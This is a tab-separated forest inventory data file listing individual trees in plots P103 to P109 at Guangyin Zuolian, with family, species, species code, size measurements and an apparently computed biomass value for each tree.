Guangyin Zuolian	2	P103	Lauraceae	Machilus	Machilus pauhoi Kanehira	MACPAU	12	10	7	0.0613767
Guangyin Zuolian	2	P103	Lauraceae	Machilus	Machilus pauhoi Kanehira	MACPAU	15	10	7	0.0932735
Guangyin Zuolian	2	P103	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1	3	2	0.000177413
Guangyin Zuolian	2	P103	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1	3	2	0.000177413
Guangyin Zuolian	2	P103	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1	3.5	2	0.000206502
Guangyin Zuolian	2	P103	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	3.5	2	0.000757716
Guangyin Zuolian	2	P103	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	4	1.4	0.000864223
Guangyin Zuolian	2	P103	Rutaceae	Evodia	Evodia lepta (Spreng.) Merr.	EVOLEP	5	7	2	0.00836267
Guangyin Zuolian	2	P103	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	9	2.5	0.0553266
Guangyin Zuolian	2	P103	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1	3	1.5	0.000177413
Guangyin Zuolian	2	P103	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1	3	1.2	0.000177413
Guangyin Zuolian	2	P103	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	1	0.000650978
Guangyin Zuolian	2	P103	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	2	0.000650978
Guangyin Zuolian	2	P103	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	4	2.5	0.000864223
Guangyin Zuolian	2	P103	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	4	2	0.00317108
Guangyin Zuolian	2	P103	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	6	3.5	0.00472771
Guangyin Zuolian	2	P103	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	7	4.5	0.011772
Guangyin Zuolian	2	P104	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	10	8	6	0.0349983
Guangyin Zuolian	2	P104	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	3.2	5	1.8	0.00259959
Guangyin Zuolian	2	P104	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2.5	3.2	3	0.00105421
Guangyin Zuolian	2	P104	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	4	0.8	0.014512
Guangyin Zuolian	2	P104	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	5	4	0.0180792
Guangyin Zuolian	2	P104	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	5	1.8	0.03101
Guangyin Zuolian	2	P104	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	5.5	1.8	0.0241973
Guangyin Zuolian	2	P104	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	5.5	1.9	0.0241973
Guangyin Zuolian	2	P104	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	5.5	2	0.0340621
Guangyin Zuolian	2	P104	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	14	6	2	0.0495507
Guangyin Zuolian	2	P104	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	7.5	6	0.0462321
Guangyin Zuolian	2	P104	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	9.5	8	0.0414532
Guangyin Zuolian	2	P104	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	0.6	0.3	0.000133386
Guangyin Zuolian	2	P104	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	1.6	0.5	0.000749774
Guangyin Zuolian	2	P104	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.8	0.6	0.000393599
Guangyin Zuolian	2	P104	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	1.8	0.6	0.000598148
Guangyin Zuolian	2	P104	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	5.2	1.8	0.6	0.00236231
Guangyin Zuolian	2	P104	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	4	2	1.3	0.00160216
Guangyin Zuolian	2	P104	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	11	2.5	0.5	0.0133084
Guangyin Zuolian	2	P104	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	8	7	0.0230299
Guangyin Zuolian	2	P104	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	8	7.5	0.0287229
Guangyin Zuolian	2	P104	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	9	8	0.0258628
Guangyin Zuolian	2	P104	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	9	8	0.0553266
Guangyin Zuolian	2	P104	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	21	9	8	0.158035
Guangyin Zuolian	2	P104	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	17	10	8.5	0.117952
Guangyin Zuolian	2	P104	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	17	10	8	0.117952
Guangyin Zuolian	2	P104	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	20	9	7.8	0.144215
Guangyin Zuolian	2	P104	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	9	5.5	4	0.0198586
Guangyin Zuolian	2	P104	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	3	4.5	4	0.0020762
Guangyin Zuolian	2	P104	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	6	5	4.5	0.00845122
Guangyin Zuolian	2	P104	Moraceae	Ficus	Ficus hirta Vahl	FICHIR	2	1.8	0.6	0.000393599
Guangyin Zuolian	2	P104	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	1.2	1.9	0.8	0.000159259
Guangyin Zuolian	2	P105	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	5	4	2.5	0.00481906
Guangyin Zuolian	2	P105	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	4	5	1	0.00395057
Guangyin Zuolian	2	P105	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	4.5	2.5	0.0130669
Guangyin Zuolian	2	P105	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	5	3.5	0.00845122
Guangyin Zuolian	2	P105	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	13	5	2	0.0360328
Guangyin Zuolian	2	P105	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	3	5.5	2.5	0.00252993
Guangyin Zuolian	2	P105	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	6	2.5	0.00472771
Guangyin Zuolian	2	P105	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	8	3	0.0179278
Guangyin Zuolian	2	P105	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	15	8	2.5	0.0748697
Guangyin Zuolian	2	P105	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	6	5.5	0.0263625
Guangyin Zuolian	2	P105	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	12	7	6	0.0431948
Guangyin Zuolian	2	P105	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.5	0.7	0.0003289
Guangyin Zuolian	2	P105	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.5	0.3	0.0003289
Guangyin Zuolian	2	P105	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	2	0.5	0.000934077
Guangyin Zuolian	2	P105	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	4	2	1.5	0.00160216
Guangyin Zuolian	2	P105	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	4	2.5	0.5	0.00199599
Guangyin Zuolian	2	P105	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	5	2.5	0.5	0.00303328
Guangyin Zuolian	2	P105	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	6	6	4	0.0101137
Guangyin Zuolian	2	P105	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	3	4	2.5	0.00184878
Guangyin Zuolian	2	P105	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	4.5	2	0.0020762
Guangyin Zuolian	2	P105	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	6	2	0.0135042
Guangyin Zuolian	2	P105	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	7	3	0.0201917
Guangyin Zuolian	2	P105	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	8	6	0.0230299
Guangyin Zuolian	2	P105	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	9	4	0.0553266
Guangyin Zuolian	2	P105	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	12	6	0.0734504
Guangyin Zuolian	2	P105	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	35	12	1.5	0.546876
Guangyin Zuolian	2	P105	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	14	7	0.289634
Guangyin Zuolian	2	P105	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	25	14	9	0.338662
Guangyin Zuolian	2	P105	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	21	7	2.5	0.123381
Guangyin Zuolian	2	P105	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	3	1.5	0.000650978
Guangyin Zuolian	2	P105	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	4	3.5	0.00184878
Guangyin Zuolian	2	P105	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	2.5	0.000650978
Guangyin Zuolian	2	P105	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	3	0.5	0.0013926
Guangyin Zuolian	2	P105	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	3.5	1	0.00278028
Guangyin Zuolian	2	P105	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	4	2.5	0.000864223
Guangyin Zuolian	2	P105	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	5	2	0.00600364
Guangyin Zuolian	2	P105	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	5	2.5	0.00600364
Guangyin Zuolian	2	P105	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	5	2.5	0.00845122
Guangyin Zuolian	2	P106	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	8	5.5	4.5	0.0159225
Guangyin Zuolian	2	P106	Fagaceae	Castanopsis	Castanopsis fabri Hance	CASFAB	16	7	3	0.074089
Guangyin Zuolian	2	P106	Fagaceae	Castanopsis	Castanopsis fabri Hance	CASFAB	17	8	4	0.094679
Guangyin Zuolian	2	P106	Lauraceae	Litsea	Litsea elongata (Wall. ex Nees) Benth. et Hook.	LITELO	5	5.5	4	0.00659455
Guangyin Zuolian	2	P106	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	3	2	0.000650978
Guangyin Zuolian	2	P106	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	6	5	0.00718464
Guangyin Zuolian	2	P106	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	6	4	0.0135042
Guangyin Zuolian	2	P106	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	6	4.5	0.0173473
Guangyin Zuolian	2	P106	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	6	5	0.0216356
Guangyin Zuolian	2	P106	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	6	5	0.0216356
Guangyin Zuolian	2	P106	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	6	3.5	0.0263625
Guangyin Zuolian	2	P106	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	7.5	5.5	0.0328428
Guangyin Zuolian	2	P106	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	1.5	0.000543971
Guangyin Zuolian	2	P106	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	11	7	5.5	0.0366909
Guangyin Zuolian	2	P106	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	10	8	6.5	0.0349983
Guangyin Zuolian	2	P106	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	13	10	7	0.0713181
Guangyin Zuolian	2	P106	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	15	10	7	0.0932735
Guangyin Zuolian	2	P106	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	25	11	9	0.267058
Guangyin Zuolian	2	P106	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	18	12	8	0.157128
Guangyin Zuolian	2	P106	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	28	12	8	0.359861
Guangyin Zuolian	2	P106	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	36	12	6.5	0.576547
Guangyin Zuolian	2	P106	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	6	6	4.5	0.0101137
Guangyin Zuolian	2	P106	Verbenaceae	Vitex	Vitex quinata (Lour.) Will.	VITQUI	3	4	3	0.00184878
Guangyin Zuolian	2	P106	Papilionaceae	Dalbergia	Dalbergia hancei Benth.	DALHAN	3	3	2	0.0013926
Guangyin Zuolian	2	P106	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	5	4.5	3	0.00541185
Guangyin Zuolian	2	P106	Rubiaceae	Pavetta	Pavetta hongkongensis	PAVHON	3	4.5	4	0.0020762
Guangyin Zuolian	2	P106	Rubiaceae	Pavetta	Pavetta hongkongensis	PAVHON	4	5	4	0.00395057
Guangyin Zuolian	2	P106	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	5	4	0.0220291
Guangyin Zuolian	2	P106	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1	2	1.5	0.000118999
Guangyin Zuolian	2	P107	Sabiaceae	Meliosma	Meliosma rigida Sieb. et Zucc.	MELRIG	3	2.5	2	0.00116368
Guangyin Zuolian	2	P107	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	4	5	4	0.00395057
Guangyin Zuolian	2	P107	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	7	6	4	0.0135042
Guangyin Zuolian	2	P107	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	6	6.5	5	0.0109433
Guangyin Zuolian	2	P107	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	7	4	0.0306851
Guangyin Zuolian	2	P107	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	24	12	8	0.269511
Guangyin Zuolian	2	P107	Lauraceae	Machilus	Machilus pauhoi Kanehira	MACPAU	10	8.5	2.2	0.0371518
Guangyin Zuolian	2	P107	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	4.5	2	0.00356116
Guangyin Zuolian	2	P107	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	5	2.5	0.00600364
Guangyin Zuolian	2	P107	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	5	2	0.00845122
Guangyin Zuolian	2	P108	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	7	8	4	0.0179278
Guangyin Zuolian	2	P108	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	6	7	4	0.011772
Guangyin Zuolian	2	P108	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	7	7.5	4	0.0168237
Guangyin Zuolian	2	P108	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	7	3	0.0157184
Guangyin Zuolian	2	P108	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	11	8	5.5	0.0418484
Guangyin Zuolian	2	P108	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	6	4	0.0135042
Guangyin Zuolian	2	P108	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	0.5	0.000118999
Guangyin Zuolian	2	P108	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	0.5	0.000118999
Guangyin Zuolian	2	P108	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	0.5	0.00043664
Guangyin Zuolian	2	P108	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	1	0.00043664
Guangyin Zuolian	2	P108	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	0.5	0.000543971
Guangyin Zuolian	2	P108	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	3	0.5	0.000177413
Guangyin Zuolian	2	P108	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	3	1	0.000379528
Guangyin Zuolian	2	P108	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	1	0.000650978
Guangyin Zuolian	2	P108	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	4	4	1.4	0.00317108
Guangyin Zuolian	2	P108	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	10	7	2	0.0306851
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	1	5	2	0.000293425
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	6	4	0.00472771
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	7	4	0.00550289
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	7	4	0.00836267
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	7	4	0.00836267
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	7	4	0.011772
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	7.5	3.5	0.0125998
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	8	4	0.00627639
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	8	4	0.00627639
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	8	5	0.00953817
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	8	5	0.00953817
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	8	5	0.00953817
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	8	5	0.0349983
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	9	5	0.0150783
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	10	7	0.0713181
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	11	7	0.0478927
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	11	7	0.0674177
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	11	3.5	0.0783376
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	11	8	0.0900186
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	11	3	0.102454
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	16	11	7	0.115637
Guangyin Zuolian	2	P108	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	12	7	0.0980737
Guangyin Zuolian	2	P108	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	7	8	4	0.0179278
Guangyin Zuolian	2	P108	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1	2.5	2	0.00014825
Guangyin Zuolian	2	P108	Annonaceae	Uvaria	Uvaria grandiflora Roxb.	UVAGRA	1.5	3	1	0.000379528
Guangyin Zuolian	2	P109	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	1.7	0.6	0.000142734
Guangyin Zuolian	2	P109	Annonaceae	Uvaria	Uvaria grandiflora	UVAGRA	2.2	1.8	1.6	0.000470637
Guangyin Zuolian	2	P109	Annonaceae	Uvaria	Uvaria grandiflora	UVAGRA	1.5	1.9	1.5	0.000242025
Guangyin Zuolian	2	P109	Annonaceae	Uvaria	Uvaria grandiflora	UVAGRA	2	2	1.8	0.00043664
Guangyin Zuolian	2	P109	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2.8	2.5	1.3	0.00102244
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	5.5	3	0.012395
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	11	6	5	0.0315224
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	7	6	0.0306851
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	7	6.2	0.0431948
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	7	6	0.0431948
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	8	6.5	0.0349983
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	8	7	0.0492664
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	15	8	4	0.0748697
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	11	8.5	6	0.0444234
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	9	8.5	0.0258628
Guangyin Zuolian	2	P109	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	11	9	8	0.0469961
Guangyin Zuolian	2	P109	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	12	8	6	0.0492664
Guangyin Zuolian	2	P109	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	12	9	8	0.0553266
Guangyin Zuolian	2	P109	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	1.5	0.8	0.000703595
Guangyin Zuolian	2	P109	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	1.7	0.5	0.000795908
Guangyin Zuolian	2	P109	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	1.8	0.6	0.000842002
Guangyin Zuolian	2	P109	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	2	0.6	0.000663557
Guangyin Zuolian	2	P109	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	5	2.2	1.2	0.00267442
Guangyin Zuolian	2	P109	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	3.5	7	6	0.00428377
Guangyin Zuolian	2	P109	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	3	8	6.5	0.00365921
Guangyin Zuolian	2	P109	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	3	8	6.5	0.00365921
Guangyin Zuolian	2	P109	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	20	12	10	0.191457
Guangyin Zuolian	2	P109	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	8	9	6	0.0258628
Guangyin Zuolian	2	P109	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	8.5	6.5	0.024447
Guangyin Zuolian	2	P109	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	24	12	6	0.269511
Guangyin Zuolian	2	P109	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	13	8.5	7	0.0607688
Guangyin Zuolian	2	P109	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	18	9	8	0.118357
Guangyin Zuolian	2	P109	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	4	1	0.00184878
Guangyin Zuolian	2	P109	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3.5	4	3.8	0.00246856
Guangyin Zuolian	2	P109	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	4.5	4	0.0020762
Guangyin Zuolian	2	P109	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	3	2.2	1.8	0.00102601
Guangyin Zuolian	2	P109	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	10	8.5	0.0521352
Guangyin Zuolian	2	P109	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	3.2	3	0.001484
Guangyin Zuolian	2	P109	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	3.5	3	0.00162093
Guangyin Zuolian	2	P109	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	4	3.5	0.00317108
Guangyin Zuolian	2	P109	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	4	3.8	0.00481906
Guangyin Zuolian	2	P109	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	4.5	4.2	0.0020762
Guangyin Zuolian	2	P109	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3.5	4.5	4.2	0.00277222
